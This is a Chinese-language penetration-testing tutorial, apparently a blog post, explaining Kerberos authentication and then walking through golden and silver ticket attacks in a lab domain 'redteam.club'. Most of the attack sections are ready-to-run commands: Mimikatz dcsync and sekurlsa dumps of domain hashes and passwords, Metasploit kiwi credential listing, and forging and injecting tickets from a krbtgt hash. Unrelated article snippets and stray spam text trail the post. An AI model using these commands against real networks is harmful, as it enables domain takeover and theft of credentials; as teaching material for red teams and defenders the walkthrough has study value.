<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    內網滲透|Kerberos認證和黃金票據

    VSole2022-12-06 09:26:49

    Kerberos認證

    介紹

    Kerberos是一種計算機網絡授權協議,用來在非安全網絡中,對個人通信以安全的手段進行身份認證。

    這個詞又指麻省理工學院為這個協議開發的一套計算機軟件。

    認證流程

    提示:

    AS(Authentication Server) 認證服務器

    KDC(Key Distribution Center) 密鑰分發中心

    TGT(Ticket Granting Ticket) 票據授權票據(票據的票據)

    TGS(Ticket Granting Server) 票據授權服務器

    ACL(Access Control Lists) 訪問控制列表

    DC(Domain Controller) 域控制器

    AD(Active Directory) 活動目錄

    Client 客戶端

    Server 服務端

    詳細流程圖

    黃金票據

    原理

    在Kerberos認證中,Client通過AS(身份認證服務)認證后,AS會給Client一個 Logon Session Key和TGT,而Logon Session Key并不會保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以偽造TGT和Logon Session Key來進入下一步Client與TGS的交互。而已有了金票后,就跳過AS驗證,不用驗證賬戶和密碼,所以也不擔心域管密碼修改。

    票據條件:

    • 域名稱
    • 域的 SID 值
    • 域的 KRBTGT 賬號的 HASH
    • 偽造D的任意用戶名

    實驗環境

    機器:

    12server4

    AD01

    域名:

    redteam.club

    Mimikatz

    12server4上操作

    信息收集

    前提域管權限


    #導出hashprivilege::debuglsadump::dcsync /domain:redteam.club /all /csv(lsadump::lsa /inject)##一條命令mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:redteam.club /all /csv" "exit">hash.txt
    

    制作

    #制作黃金票據mimikatz.exe "kerberos::golden /admin:system /domain:redteam.club /sid:S-1-5-21-2536581826-3274276096-3456299113 /krbtgt:689fe33346a9e9fe229395fb36178ecb /ticket:ticket.kirbi" exit
    

    導入

    #清除票據kerberos::purge#導入票據kerberos::ptt C:\Users\ticket.kirbi
    

    Metasploit

    12server4上操作

    system權限信息收集

    #信息收集load kiwi   #導入kiwi模塊
    ##提示:以下需要system權限creds_all    #列舉所有憑據creds_kerberos  #列舉所有kerberos憑據kiwi_cmd sekurlsa::logonpasswords  #抓密碼和hash
    

    域管權限信息收集

    #信息收集(需要域管權限)kiwi_cmd "lsadump::dcsync /domain:redteam.club /user:krbtgt"  #krbtgt賬戶的密碼hash值kerberos_ticket_list  #列舉kerberos票據 kerberos_ticket_purge  #清除kerberos票據
    

    制作及導入

    #制作金票golden_ticket_create -d redteam.club -k 689fe33346a9e9fe229395fb36178ecb -u administrator -s S-1-5-21-2536581826-3274276096-3456299113 -t /home/kali/administrator.ticket#導入金票kerberos_ticket_use /home/kali/administrator.ticket
    

    CobaltStrike

    AD01上操作

    注意

    在使用CobaltStrike4.7時,只有在AD上才能抓取到krbtgt的hash,二前兩個有域管權限就可以

    希望可以得到師傅們的指點

    12server4:12server4\administratorredteam\administrator均不成功

    AD01:redteam\administrator成功抓取

    流程

    1.抓取hash

    2.shell whoami /all

    3.制作金票

    白銀票據

    原理

    白銀票據就是偽造的ST。在Kerberos認證的第三部,Client帶著ST和Authenticator3向Server上的某個服務進行請求,Server接收到Client的請求之后,通過自己的Master Key 解密ST,從而獲得 Session Key。通過 Session Key 解密 Authenticator3,進而驗證對方的身份,驗證成功就讓 Client 訪問server上的指定服務了。所以我們只需要知道Server用戶的Hash就可以偽造出一個ST,且不會經過KDC,但是偽造的門票只對部分服務起作用。

    票據條件:

    • 域名
    • 域 SID(就是域成員SID值去掉最后的)
    • 目標服務器的 FQDN
    • 可利用的服務
    • 服務賬號的 NTLM Hash
    • 需要偽造的用戶名

    這里就制作一個

    mimikatz

    12server4上操作

    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt
    

    cifs

    #命令格式kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目標服務器主機名> /service:<服務類型> /rc4: /user:<偽造的用戶名> /ptt#示例kerberos::golden /domain/target:OWA2010CN-God.god.org /rc4:689fe33346a9e9fe229395fb36178ecb  /service:cifs /user:admin /ptt
    

    kerberoshash
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Kerberos認證介紹Kerberos是一種計算機網絡授權協議,用來在非安全網絡中,對個人通信以安全的手段進行身份認證。這個詞又指麻省理工學院為這個協議開發的一套計算機軟件。而已有了金票后,就跳過AS驗證,不用驗證賬戶和密碼,所以也不擔心域管密碼修改。
    如今,許多企業依賴這種道德黑客工具更有力地保護數據免受各種攻擊。可以在短短24小時內掃描1000多個Web應用程序。自動檢測URL重寫規則和自定義404錯誤頁面。可以檢查服務器并檢測過時版本或特定版本存在的問題。根據上下文確定處理結果的優先級。能夠執行字典攻擊。可以用于在網絡內執行橫向移動,以訪問受限制的數據。
    內網滲透TIPS總結
    2023-01-28 11:00:41
    內網基礎知識1、工作組:工作組是 局域網 中的一個概念,他是長久的資源管理模式。默認情況下使用工作組方式進行資源管理,將不同的 computer 按照不同的要求分類到不同的組。而實際上,因為域名的計算機是使用DNS 來定位域控制器、服務器及其他計算機、網絡服務的,所以域的名字就是DNS 域的名字。在內網滲透測試中,大都是通過尋找 DNS 服務器來確定域控制器的位置的。
    但由于Msg B是使用 TGS密鑰 加密的,Client無法對其解密。AS響應的消息中有一條是屬于Client的,但另外一條卻屬于TGS。
    kerberos協議從0到1
    2021-10-12 14:26:38
    krbtgt用戶,是系統在創建域時自動生成的一個帳號,其作用是密鑰分發中心的服務賬號,其密碼是系統隨機生成的,無法登錄主機
    kerberos委派詳解
    2021-10-08 14:49:15
    委派域委派是指,將域內用戶的權限委派給服務賬號,使得服務賬號能以用戶權限開展域內活動。服務賬號,域內用戶的一種類型,服務器運行服務時所用的賬號,將服務運行起來并加入域。例如MSSQL Server在安裝時,會在域內自動注冊服務賬號'SqlServiceAccount',這類賬號不能用于交互式登錄。
    客戶端收到該信息,使用自己的密碼進行解密之后,得到TGT票據。客戶端將服務請求與該ticket一并發送給相應的服務端即可。0x02 Kerberos協議具體流程 用戶登陸 用戶使用客戶端上的程序進行登陸。客戶端認證 客戶端從認證服務器獲取票據授權票據Ticket Granting Ticket簡稱TGT。服務器Server向客戶端Client提供相應的服務。0x03 白銀票據Silver Ticket偽造 白銀票據偽造的是TGS的票據,是一個點對點的有效憑證。
    本文是很久之前做的筆記,今天有空又梳理了一下,分享出來。如果有錯誤或疏漏,歡迎留言指出。 Kerberos是一種基于票據的、集中式的網絡認證協議,適用于C/S模型,由MIT開發和實現(http://web.mit.edu/kerberos/dist/)。 這里所謂的認證,就是保證使用票據(Ticket)的用戶必須是票據中指定的用戶。 簡單回憶一下,密碼學涉及機密性、完整性、認證性(實體認證+
    本文主要討論學習mimikatz中與Kerberos協議相關的代碼
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类